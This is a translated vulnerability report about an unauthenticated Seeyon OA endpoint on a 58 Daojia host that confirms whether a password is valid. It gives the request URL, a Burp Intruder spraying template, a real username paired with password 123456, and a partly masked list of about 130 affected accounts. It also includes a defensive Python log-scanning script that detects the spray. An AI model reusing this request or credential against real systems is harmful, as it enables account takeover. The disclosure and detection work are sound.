A 58 Daojia system has a large number of weak passwords
Detailed description:
Reference: WooYun: Zhiyuan (Seeyon) A8-V5 arbitrary user password modification vulnerability
http://oa.daojia.58.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=xxxuser&P_2_String=xxxpwd
This endpoint returns true if the username (P_1_String) and password (P_2_String) match an existing account, and false otherwise, with no authentication or rate limiting in front of it.
For example:
http://oa.daojia.58.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=guoyi&P_2_String=123456
Login succeeded (the endpoint returned true).
Packet capture (the § markers are Burp Intruder insertion points):
GET //seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=§xxxuser§&P_2_String=§xxxpwd§ HTTP/1.1
Host: oa.daojia.58.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:
Connection: keep-alive
Using the usernames from the address book with 123456 as the password,
more than one hundred and thirty accounts returned true.
Usernames, manually masked:
wa***enzh***ngwa***uizo***ngzh***ngta***yiwa***anzh***ngdu***eica***bogu***yidi***anch***ngda***lidu***aodu***ngfa***uiha***aohu***anhu***dili***eili***ngli***ngli***heli***inlu***ngpe***xuta***ngwa***ngwe***ngwu***ngxu***iaya***aoya***enya***ngyi***ngzh***unzh***zizh***ngzh***ngzh***anch***eizh***iase***n2zh***anzh***ngli***aoge***yudu***enzh***anca***anni***infa***uoga***aoya***diwu***xuqu***uiye***ngma***ngsu***ngli***unlv***ngwa***eizh***huzh***yuge***yuyi***ngma***lili***anzh***angu***enbu***uezh***yixi***unou***lidu***inlu***ngdi***liya***liso***ngzh***anso***anji***ngwa***anso***iaba***naho***eicu***ngca***uawa***unwa***yupa***anhu***yuhu***yawe***yuyu***anma***aoca***ueme***enzh***ngli***eili***qihu***enji***anlu***nggu***eide***yure***anre***ngwe***ngxi***ngyu***uisu***unya***nazh***ngti***gehu***qizh***ngdu***anxu***uiya***eini***aohu***nglu***uita***yuji***ngli***humi***suli***iafe***inwu***unca***ngso***anfa***aozh***nglu***aoyu***bohe***lewa***in
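As an added defender-side example (not part of the original report), the following Python script scans web-server access-log lines for the pattern described above: one client calling isOldPasswordCorrect for many different P_1_String values with the same P_2_String inside a short time window. The log lines, IP addresses and usernames are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (combined log format); not a real capture.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Nov/2015:10:00:01 +0800] "GET /seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=user01&P_2_String=123456 HTTP/1.1" 200 61
10.0.0.5 - - [10/Nov/2015:10:00:02 +0800] "GET /seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=user02&P_2_String=123456 HTTP/1.1" 200 61
10.0.0.5 - - [10/Nov/2015:10:00:02 +0800] "GET /seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=user03&P_2_String=123456 HTTP/1.1" 200 61
10.0.0.5 - - [10/Nov/2015:10:00:03 +0800] "GET /seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=user04&P_2_String=123456 HTTP/1.1" 200 61
10.0.0.5 - - [10/Nov/2015:10:00:04 +0800] "GET /seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=user05&P_2_String=123456 HTTP/1.1" 200 61
10.0.0.9 - - [10/Nov/2015:10:01:00 +0800] "GET /seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=alice&P_2_String=S3cret HTTP/1.1" 200 61
10.0.0.9 - - [10/Nov/2015:10:01:05 +0800] "GET /seeyon/main.do HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_checks(log_text):
    """Yield (ip, timestamp, user, password) for each isOldPasswordCorrect call in the log."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, target = m.groups()
        url = urlsplit(target)
        q = parse_qs(url.query)
        if not url.path.endswith("/getAjaxDataServlet") or q.get("M") != ["isOldPasswordCorrect"]:
            continue
        yield ip, datetime.strptime(ts, TS_FMT), q.get("P_1_String", [""])[0], q.get("P_2_String", [""])[0]

def find_password_spray(log_text, window=timedelta(minutes=10), min_users=5):
    """Return {ip: stats} for clients probing at least min_users distinct accounts within one window."""
    by_ip = defaultdict(list)
    for ip, ts, user, pwd in parse_checks(log_text):
        by_ip[ip].append((ts, user, pwd))
    hits = {}
    for ip, events in by_ip.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:  # slide the window start forward
                start += 1
            span = events[start:end + 1]
            users, pwds = {u for _, u, _ in span}, {p for _, _, p in span}
            if len(users) >= min_users and (ip not in hits or len(users) > hits[ip]["distinct_users"]):
                # A single password across many accounts is the spraying signature seen in this report.
                hits[ip] = {"distinct_users": len(users), "distinct_passwords": len(pwds), "spray": len(pwds) == 1}
    return hits
```

The same counters can drive an alert or a block rule in front of the endpoint, since one client checking dozens of accounts in a few seconds has no legitimate use of a password-change helper.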
Proof of vulnerability:
http://oa.daojia.58.com//seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=guoyi&P_2_String=123456
How to exploit: masked (see above).
Solution: